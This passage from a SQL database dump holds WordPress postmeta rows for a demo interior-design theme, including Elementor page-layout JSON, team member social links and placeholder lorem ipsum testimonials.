esse.\",\"_id\":\"9838c98\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"02e7bd7\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}}],\"author_name_typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"72b0264\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"097c6c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"bcfb858\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-planning-stage.jpg\",\"id\":2348,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c89147\",\"elType\":\"widget\",\"settings\":{\"title\":\"Planning stage\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d8cf87d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3ca0de\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"d1a9295\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"807dfde\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-flexible-output.jpg\",\"id\":2346,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9fe7239\",\"elType\":\"widget\",\"settings\":{\"title\":\"Flexible output\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"682b6ee\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f17e180\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Complete italian wooden works\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"44bef5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"13d4194\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-new-material.jpg\",\"id\":2347,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4feef43\",\"elType\":\"widget\",\"settings\":{\"title\":\"New material\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6fd75c6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"There are many variations of passages of psum available but the majority have suffered.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c06dabc\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"  Premium quality of full apartment\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false}]'),(1345,1100,'_elementor_page_assets','a:0:{}'),(1347,2465,'ova_team_met_avatar_id','923'),(1348,2465,'ova_team_met_avatar','https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg'),(1349,2465,'ova_team_met_job','Architecture'),(1350,2465,'ova_team_met_group_icon','a:4:{i:0;a:2:{s:30:\"ova_team_met_class_icon_social\";s:14:\"fab fa-twitter\";s:24:\"ova_team_met_link_social\";s:20:\"https://twitter.com/\";}i:1;a:2:{s:30:\"ova_team_met_class_icon_social\";s:15:\"fab fa-facebook\";s:24:\"ova_team_met_link_social\";s:41:\"https://www.facebook.com/ovatheme.envato/\";}i:2;a:2:{s:30:\"ova_team_met_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:24:\"ova_team_met_link_social\";s:26:\"https://www.pinterest.com/\";}i:3;a:2:{s:30:\"ova_team_met_class_icon_social\";s:16:\"fab fa-instagram\";s:24:\"ova_team_met_link_social\";s:26:\"https://www.instagram.com/\";}}'),(1351,2465,'ova_team_met_slogans','<h3>I help my clients stand out and they help me grow.</h3>\r\n<p>Lorem ipsum dolor sit amet, con adipiscing elit tiam convallis elit id impedie. Quisq commodo simply free ornare tortor.</p>\r\n\r\n<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden in the middle of text.</p>'),(1352,2465,'ova_team_met_order_team','1'),(1353,2465,'_elementor_edit_mode','builder'),(1354,2465,'_elementor_template_type','wp-post'),(1355,2465,'_elementor_version','3.6.6'),(1356,2465,'_wp_page_template','default'),(1357,2465,'_elementor_data','[{\"id\":\"fdf95b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c1adc30\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":40,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"88add9e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Personal experience\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ffc3307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"90f1ef9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"349a0b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"f0b4c3f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"7ef98be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Interior\",\"percent\":{\"unit\":\"%\",\"size\":40,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b1c78b6\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-3.jpg\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b35674a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"f6c85fe\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_3\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"6030bc4\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"c9dec93\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"7512efb\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"}}],\"dot_control\":\"\",\"content_color\":\"#FFFFFF\",\"author_name_color\":\"#FFFFFF\",\"content_testimonial_typography_typography\":\"custom\",\"content_testimonial_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"content_testimonial_typography_font_weight\":\"500\",\"content_testimonial_typography_line_height\":{\"unit\":\"em\",\"size\":1.6,\"sizes\":[]},\"author_name_typography_typography\":\"custom\",\"author_name_typography_font_weight\":\"800\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"job_typography_font_weight\":\"700\",\"job_typography_text_transform\":\"uppercase\",\"job_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"job_color\":\"#E3B25A\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"background_item_padding_mobile\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"5c64a4f\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8a92eb0\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"78a7995\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"253227a\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9838c98\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"02e7bd7\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}}],\"author_name_typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27c1be6\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d2671f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"a61f2bd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-planning-stage.jpg\",\"id\":2348,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91355df\",\"elType\":\"widget\",\"settings\":{\"title\":\"Planning stage\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e06b4f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f2bb79e\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"49ac777\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"7a518f5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-flexible-output.jpg\",\"id\":2346,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"21dc602\",\"elType\":\"widget\",\"settings\":{\"title\":\"Flexible output\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"dab0350\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"06b4b1f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Complete italian wooden works\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"2790340\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"ef7e04a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-new-material.jpg\",\"id\":2347,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"72ea037\",\"elType\":\"widget\",\"settings\":{\"title\":\"New material\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4c25ffa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"There are many variations of passages of psum available but the majority have suffered.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ffa8158\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"  Premium quality of full apartment\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false}]'),(1358,2465,'_elementor_page_assets','a:0:{}'),(1360,2467,'ova_team_met_avatar_id','922'),(1361,2467,'ova_team_met_avatar','https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg'),(1362,2467,'ova_team_met_job','Interior designer'),(1363,2467,'ova_team_met_group_icon','a:4:{i:0;a:2:{s:30:\"ova_team_met_class_icon_social\";s:14:\"fab fa-twitter\";s:24:\"ova_team_met_link_social\";s:20:\"https://twitter.com/\";}i:1;a:2:{s:30:\"ova_team_met_class_icon_social\";s:15:\"fab fa-facebook\";s:24:\"ova_team_met_link_social\";s:41:\"https://www.facebook.com/ovatheme.envato/\";}i:2;a:2:{s:30:\"ova_team_met_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:24:\"ova_team_met_link_social\";s:26:\"https://www.pinterest.com/\";}i:3;a:2:{s:30:\"ova_team_met_class_icon_social\";s:16:\"fab fa-instagram\";s:24:\"ova_team_met_link_social\";s:26:\"https://www.instagram.com/\";}}'),(1364,2467,'ova_team_met_slogans','<h3>I help my clients stand out and they help me grow.</h3>\r\n<p>Lorem ipsum dolor sit amet, con adipiscing elit tiam convallis elit id impedie. Quisq commodo simply free ornare tortor.</p>\r\n\r\n<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden in the middle of text.</p>'),(1365,2467,'ova_team_met_order_team','1'),(1366,2467,'_elementor_edit_mode','builder'),(1367,2467,'_elementor_template_type','wp-post'),(1368,2467,'_elementor_version','3.6.6'),(1369,2467,'_wp_page_template','default'),(1370,2467,'_elementor_data','[{\"id\":\"fdf95b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c1adc30\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":40,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"88add9e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Personal experience\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ffc3307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"90f1ef9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"349a0b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":85,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"f0b4c3f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"7ef98be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Interior\",\"percent\":{\"unit\":\"%\",\"size\":40,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"uni